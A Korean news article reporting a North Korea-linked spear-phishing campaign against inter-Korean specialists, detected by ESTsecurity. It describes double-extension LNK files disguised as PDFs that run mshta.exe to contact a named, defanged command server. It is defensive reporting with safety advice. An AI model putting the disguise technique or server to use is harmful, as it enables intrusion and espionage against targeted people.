"Beware of Malicious Files Disguised as PDF Documents"
North Korean hacking
[Asia Economy Reporter Jang Hee-jun] North Korea attempted cyber attacks targeting individuals working in the inter-Korean sector. Recently, hacking attempts by North Korea against individuals rather than government agencies or institutions have become frequent, and these are analyzed as efforts to steal South Korean intelligence on North Korea or to recruit experts.
Security firm ESTsecurity announced on the 2nd that a North Korea-linked hacking attack disguised as a request for discussion papers for a South-North diplomatic and security academic conference was detected.
This attack targeted domestic personnel working in diplomacy, security, unification, and related academic conference or year-end event attendees in the inter-Korean field. The attackers sent emails that appeared to inquire about event schedules or request materials, and used a so-called 'two-track' method by selectively approaching those who replied.
The initial emails sent did not contain malicious attachments or URL links commonly used in hacking attacks, avoiding suspicion. However, many of the follow-up emails after replies were found to include malicious files or problematic links.
Screen of a double extension LNK malicious file disguised as a PDF document [Photo by East Security]
In particular, a malicious file of the 'shortcut (LNK)' type with a double extension designed to look like a normal PDF document was discovered.
For example, a file named 'Important Document.PDF.LNK' appears as 'Important Document.PDF' because the 'shortcut (LNK)' extension part is hidden by the Windows operating system. On the surface, it looks like an ordinary PDF file.
However, the problematic 'shortcut (LNK)' file was confirmed to contain commands that secretly attempt communication with a specific web server (ark6835.scienceontheweb[.]net) through the 'mshta.exe' program. Notably, this server has been consistently found in hacking attacks believed to be backed by North Korea.
Jong-hyun Moon, director of ESTsecurity, advised, "When receiving files that appear to be PDF documents, carefully check for double extensions," and added, "Do not carelessly extract files that come compressed; first check the internal list before accessing."
Meanwhile, according to the National Intelligence Service, the average daily number of attack attempts by international and state-backed hacking groups reaches 1.15 million. The intelligence authorities judge that many of these are the work of North Korea.
Previously, when a fire at the SK C&C Pangyo data center caused Kakao service disruptions, phishing emails titled '[Kakao] Partial Service Error Recovery and Emergency Measures Notice' were sent targeting North Korea-related industry workers, defectors, and politicians.
© The Asia Business Daily(www.asiae.co.kr). All rights reserved.
